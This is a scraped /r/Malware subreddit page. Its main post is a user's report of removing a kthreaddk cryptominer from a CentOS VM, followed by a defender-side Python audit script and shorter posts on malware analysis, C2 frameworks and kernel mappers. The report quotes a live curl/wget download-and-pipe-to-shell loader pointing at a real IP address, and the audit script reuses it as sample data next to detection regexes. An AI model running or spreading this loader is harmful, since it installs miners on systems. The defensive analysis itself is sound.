/r/Malware


A place for malware reports and information.

A place for malware reports and information for [anti]malware professionals and enthusiasts.

This is NOT a place for help with malware removal or any type of tech support. Ask your IT support staff, your search engine of choice, another subreddit (/r/antivirus or /r/techsupport for example), or a friend or relative. In that order.

Content rules:

  • This is a subreddit for readers to discuss technical malware news, malware internals and infection techniques, malware tools, and anything related to the professional world of [anti]malware. Technical Support posts are forbidden and will result in removal and a possible ban.
  • Our readers are intelligent, or at the very least technically curious. Posted content must be highly technical, well-researched, and of good quality.
  • Do not sensationalize or otherwise unnecessarily change the original title of the article you are linking. Clickbait will result in an immediate and permanent ban.

Chat with us:

#reddit-malware:matrix.org


73,478 Subscribers

9

kthreaddk malware on Centos 7.9

A search online indicates this is a crypto mining malware that's been there since 2020. Probably related to 'threaddk'.

I encountered it on my digitalocean VM running Centos 7.9. I had set up the VM to test out some legacy app.

Most sources link this malware to postgre but in my case I don't even have postgresql installed, let alone running.

I suspect the vulnerability that was exploited was the old version of Java that I am using - JDK 1.6.

I found this when I ran htop (after I noticed lagging due to high cpu usage):

 /usr/lib/jvm/java-1.6.0-openjdk-1.6.0.41.x86_64/jre/bin/java -classpath /tmp/~spawn1012433150472493028.tmp.dir metasploit.Payload

The tmp file had either been deleted or renamed. I couldn't find it.

Stopping this process didn't help.

As with the relatives, killing the kthreaddk processes just got them respawned.

The affected user was my ssh user (more on this later) so deleting the cron file just got it recreated.

To remove the cron successfully (hopefully), I did the following as root:

  1. Created another temporary user
  2. Added this new user to sudo list (visudo)
  3. Removed my ssh user from sudo list. This was to hopefully stop it from recreating the cron file. Adding the user to cron.deny file hadn't worked.
  4. Delete or edit the cron file.

Mine was /var/spool/cron/[username] with only this one line.

    * * * * * /home/[username]/.cache/pip/http/1/3/2/6/l7nj8o

  5. Now I stopped kthreaddk processes

    pkill -9 kthreaddk

My initial plan had been to kill all processes by the ssh user. This hadn't worked for some reason.

  6. Delete the file referenced in the cron

Not surprisingly, the file wasn't available. I ended up clearing my entire .cache folder just to be safe.

After that the malware seems to have been kicked out.

Further analysis: Now that the server was a lot more responsive I embarked on checking a few things:

a) ls -al /tmp revealed a hidden folder called .pwn

In it there was a binary file called bprofr. A bit of Google shows it is also malicious. Not sure if it's related to the kthreaddk. I deleted the file just as a precaution.

b) I had mentioned ssh user. I haven't logged into this server for over a month. So when I ssh'd into it I got weird errors. Like the ones you get when you paste random text into a shell by mistake.

So after stopping the malware I checked my .bashrc and bash_profile. They are both extremely compromised.

Warning: The contents are potentially harmful! Caution advised.

Here are the links to .bashrc and .bash_profile

I'll just post the .bash_history here:

    (curl 194.38.23.2/ldr.sh?e39dc2||curl -k 194.38.23.2/ldr.sh?e39dc2||wget -O- 194.38.23.2/ldr.sh?e39dc2)|sh 1>/dev/null 2>&1 & ll pwd exit

I have not deleted these files yet. I am tempted to log in again with the infected user to see if I can get the machine re-infected. The VM will be destroyed anyway as the testing is over.


2 Comments
2023/12/07
17:54 UTC
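A small defender-side audit for the artefacts this post describes: every-minute cron jobs whose command sits in a hidden cache or temp path, download-and-pipe-to-shell lines planted in shell startup files, kthreaddk / metasploit.Payload processes, and hidden directories under /tmp. This is an added example, not the poster's code; the sample inputs are constructed from the post's own lines, and the function names, regexes and the benign-directory allowlist are my own assumptions.

```python
import re
from typing import Dict, List

# Constructed sample inputs mirroring the artefacts in the post; not real captures.
SAMPLE_CRONTAB = "* * * * * /home/[username]/.cache/pip/http/1/3/2/6/l7nj8o\n"
SAMPLE_BASHRC = (
    "# .bashrc\nalias ll='ls -l'\n"
    "(curl 194.38.23.2/ldr.sh?e39dc2||wget -O- 194.38.23.2/ldr.sh?e39dc2)|sh 1>/dev/null 2>&1 &\n"
)
SAMPLE_PROCS = [
    "kthreaddk",
    "/usr/lib/jvm/java-1.6.0-openjdk-1.6.0.41.x86_64/jre/bin/java "
    "-classpath /tmp/~spawn1012433150472493028.tmp.dir metasploit.Payload",
    "sshd: user@pts/0",
]
SAMPLE_TMP = [".pwn", "hsperfdata_root", ".X11-unix"]

# Download-and-pipe-to-shell, and commands living in hidden, cache or temp paths.
PIPE_TO_SH = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
HIDDEN_OR_TMP = re.compile(r"(^|/)\.[^/]+/|^/(var/)?tmp/|^/dev/shm/")
BENIGN_TMP_DIRS = {".X11-unix", ".ICE-unix", ".font-unix", ".XIM-unix"}  # assumed allowlist

def check_crontab(text: str) -> List[str]:
    """Flag every-minute cron jobs whose command lives in a hidden/cache/temp path."""
    findings = []
    for line in text.splitlines():
        parts = line.split(None, 5)          # five schedule fields + the command
        if len(parts) < 6 or parts[0].startswith("#"):
            continue
        if " ".join(parts[:5]) == "* * * * *" and HIDDEN_OR_TMP.search(parts[5]):
            findings.append(f"every-minute cron from hidden/temp path: {parts[5]}")
    return findings

def check_shell_rc(text: str) -> List[str]:
    """Flag download-and-execute one-liners planted in .bashrc / .bash_profile."""
    return [f"pipe-to-shell in startup file: {l.strip()}" for l in text.splitlines() if PIPE_TO_SH.search(l)]

def check_processes(cmdlines: List[str]) -> List[str]:
    """Flag the process names and command lines the post associates with the miner."""
    return [f"suspicious process: {c}" for c in cmdlines
            if c.split()[:1] == ["kthreaddk"] or "metasploit.Payload" in c or "-classpath /tmp/" in c]

def check_tmp(entries: List[str]) -> List[str]:
    """Flag hidden entries in /tmp other than the usual X11/ICE socket directories."""
    return [f"hidden entry in /tmp: {e}" for e in entries if e.startswith(".") and e not in BENIGN_TMP_DIRS]

def audit(crontab=SAMPLE_CRONTAB, rc=SAMPLE_BASHRC, procs=SAMPLE_PROCS, tmp=SAMPLE_TMP) -> Dict[str, List[str]]:
    """Run all four checks and group the findings by source."""
    return {"cron": check_crontab(crontab), "rc": check_shell_rc(rc),
            "procs": check_processes(procs), "tmp": check_tmp(tmp)}
```

On a live host you would feed it the output of `crontab -l` per user, the user's startup files, `ps -eo args`, and `ls -a /tmp`; the post's point that the cron and process come back until the user's sudo access is removed means the checks are worth re-running after cleanup.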

6

Petya Malware Analysis VM Issue

Hello! I'm getting into malware analysis for a university assignment, and I'm currently comparing Wannacry and Petya. Wannacry went fine in the virtual machine for dynamic analysis, but Petya began to write to the boot file, and now my Hyper V Windows 10 VM gives me the error that it can't boot?

I've tried it twice, reverting to checkpoint and restarting but I get the same Hyper V issue: No operating system was loaded.


Does anyone know a fix by any chance?

Edit: Downgrading to Windows 7 fixed my issue, Petya now finally asks me to send it money

10 Comments
2023/12/06
07:53 UTC

4

Looking for the old Insane Reality zines by Immortal Riot

2 Comments
2023/12/03
16:58 UTC

9

Analyzing Malicious Microsoft Office Word Malware | HackTheBox Emo

We covered analyzing an office document that has embedded Macro code written in Visual Basic. The document was claimed to cause ransomware infection, so we performed a static analysis including extracting relevant strings, calculating the MD5 hash and metadata, and revealing the hidden Macro routine using tools such as olevba. Then we submitted the hash to online analysis engines such as VirusTotal and it was found to be malicious in that it executes a PowerShell command that contacts a C2 server to download further payloads. We also found instances of XOR encryption along with the XOR key, which was then used to decrypt characters that had previously been encoded in decimal form.

Video is here

Writeup is here

1 Comment
2023/12/03
13:09 UTC

8

Portable executable explained through rust code

https://itehax.com/blog/portable-executable-explained-throught-rust-code

Hi folks, in this guide I will explain the PE format and how to parse it, all using rust.

1 Comment
2023/11/24
11:19 UTC

60

Why did Stuxnet affect non-nuclear industrial control systems?

I understand that Stuxnet is capable of spreading to non-nuclear industrial control systems, but after infecting a non-nuclear control system why did it negatively impact those control systems? It would have been like "I have code to hinder a nuclear centrifuge, but this machine seems to be the control system of a non-nuclear factory and I have no clue what to do other than end of code reached".

21 Comments
2023/11/23
18:28 UTC

24

Understanding Malware from the Inside

Hey everyone, I am a cybersecurity student getting my B. Sc. at UoPX and am currently studying for my GIAC, Pentest+, and ISC2 CC. I recently got heavily interested in threat hunting and threat intelligence, as I have always had a fascination with the destructive effects of APTs on their targets.

I have been volunteering my free time when I am not studying to analyze malware and report live IP callbacks to CISA and IC3, and to report those IPs and domains on AbuseIPDB. I have reported groups like BlackMatter and the people behind Agent Tesla recently, and even done write-ups explaining to the public about these groups and their methods of attack.

I have been programming in 14 languages for 12 years but recently I also took on C/C++ to start developing and testing the effects of self-built malware on VMs (VirtualBox). I wanted to understand how much work and expertise these groups have and educate the public about how to mitigate the threats, to understand how TAs use things like self-made crypters, and how they obfuscate their malware in order to make it FUD or at least mostly FUD.

This helps people understand their methods, and I aim to eventually develop an IDS of my own to help fight these threats and detect them before they become so destructive.

Please note, I ABSOLUTELY am not for the destructive uses of malware programming, but until you have programmed something like what attackers use you cannot fully understand how complicated it is and the depth of their knowledge / skillset.

I am excited to take my certifications, and I am planning to volunteer for the VIRT program in my state soon to further my knowledge on defending against threats.

23 Comments
2023/11/20
00:05 UTC

11

C2 Framework

If one developed a C2 Framework with pretty good Windows evasion and poly- and metamorphic engines, what would make the most sense to do while developing it further?

  • Make it open source
  • Only use it during own red team engagements
  • Make it commercial

9 Comments
2023/11/18
17:36 UTC

9

Is there an encyclopedia of DOS Viruses and their payloads?

Hi there!

I have a collection of DOS viruses I want to experiment with on a VM, but I'd like to know more information about these pieces of malware.

Is there any sort of DOS virus encyclopedia where I can get a description of payloads? I know some of these things are oddly specific and would like to get more info.

9 Comments
2023/11/16
17:32 UTC

5

Creating a windows kernel manual mapper

Does anyone have any good articles or blogs on creating a kernel manual mapper? I've read a few mappers like kdmapper and nullmapper, but I don't understand them enough to go and find a vulnerable driver then make my own mapper. Any articles that could help me with this would be appreciated even if they aren't explicitly explaining how to make a manual mapper. Thx

4 Comments
2023/11/15
12:53 UTC

5

How do malware builders work?

AFAIK, most malware builders modify some type of information within a pre built stub to change their configuration. One way I have found is through Resources. One can modify and get Resources using simple WinAPI functions. What are the other ways?

10 Comments
2023/11/15
11:03 UTC

21

Ghidra reverse engineering malware filled with empty space.

I have been reverse engineering a piece of malware that attacked a friend of mine. It's a single executable around 70MB and upon loading it up I noticed that the majority of it is zeroed-out memory.
In a section called .ndata 60% of the program is interpreted like this:

    0047b002 ?? ??

Which I'm assuming is either some unknown data type or the creator's attempt at giving the executable enough size so that someone doesn't suspect the file size, as it's supposed to be mocked up as a game.

I am quite new to ghidra and reverse engineering so if I've misinterpreted what this could be then please let me know, what do other people interpret this as?

9 Comments
2023/11/14
00:19 UTC

8

Video: .NETReactor deobfuscation and configuration decryption of AgentTesla

1 Comment
2023/11/12
08:11 UTC

4

Can FM Radio Receivers Be Physically Tracked or Exploited? Can Devices in Airplane Mode Be Physically Tracked or Exploited?

Assuming the devices have no malware on them.

Take an old iPod Nano or handheld device that can listen to local radio stations but can't go online, have no Bluetooth, etc. Pretend Snowden has one and he's listening to it as he walks around. If a team of NSA/CIA agents are physically following him or physically trying to locate him, is there any signal or identifying signal emanating from his device that can identify him, pinpoint him, or be used to follow him or locate him while he just listens to local radio? Could an adversary somehow send malware to his device via FM/AM radio?

Same questions but for an iPod Touch in airplane mode. And a laptop in airplane mode. And a smartphone in airplane mode.

I understand there are many variations, complexities, and firmware risks involved as well. But my question is more about what's going on via hardware and firmware when such devices are in airplane mode without having malware on the main OS at least. As well as whether bare bones devices like an old iPod Nano (without any malware) can be subject to tracking or exploitation via passive radio receiver or some other way.

Just curious.

7 Comments
2023/11/11
23:42 UTC

4

Gazprom Reborn

Does anyone know any more about this ransomware?

All I can find on them is this article. https://www.sentinelone.com/anthology/gazprom/

3 Comments
2023/11/10
14:42 UTC

44

VX-Underground is now selling Physical Copies of their archive!

Whats included?

  • 37,745 APT papers and samples
  • 7,147 archived materials (papers, old software, malware builders)
  • 11,460 malware papers
  • 36,000,000+ malware samples (5.06TB)
  • 3,197 malware source code(s) file(s)
  • $500 (this includes shipping)
  • Handwritten thank you letter
  • 10TB Seagate external HDD
  • Worldwide shipping
  • Delivery times vary (location, queue, ???)

https://www.vx-underwear.org/products/vx-underground-collection-hdd

7 Comments
2023/11/10
05:52 UTC

13

Starting point.

Anyone know any good interactive tutorials for learning C / C++? I want to learn one or both of those programming languages to get started on Mal analysis / RE. I know a few sites to learn but the whole "read 37 pages and then try it yourself without any examples or guidance" is not a very fun route to go for starting out. I feel like I would enjoy that more later on as an intermediate programmer.

10 Comments
2023/11/08
17:42 UTC

10

Best place to get specific malware samples

Hey - I am conducting a research project that involves looking at how much energy some malware forms take, and I want to focus specifically on energy eating malware types, like cryptominers. Where could I download such malware sample forms to help me with this research?


Thanks for the help

12 Comments
2023/11/02
12:41 UTC

15

Malware beginner roadmap

Hey!
I am a newbie in the field and I wish to learn more
I am currently finishing the TCM-Security practical malware analysis and triage course
And I wish to learn more
what free/paid resources do you suggest?

11 Comments
2023/11/01
08:17 UTC
